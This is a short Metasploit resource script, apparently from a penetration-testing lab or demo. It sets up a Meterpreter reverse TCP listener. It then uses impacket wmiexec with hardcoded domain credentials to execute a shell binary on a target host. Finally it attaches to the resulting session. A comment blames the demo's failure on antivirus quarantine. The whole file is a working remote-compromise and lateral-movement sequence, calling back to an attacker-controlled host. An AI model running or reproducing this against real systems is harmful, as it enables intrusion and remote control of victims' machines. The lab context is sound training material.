#!/bin/bash
#resource2.rc

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.22.117.100
set LPORT 4444
exploit -j

use scanner/smb/impacket/wmiexec
set RHOSTS 172.22.117.20
set SMBDomain megacorpone
set SMBPass Password!
set SMBUser tstark
set COMMAND C:\\shell.exe
run
#this is where i suspect the demo faulted due to the edr/av quarantining shell.exe
sessions -i 1
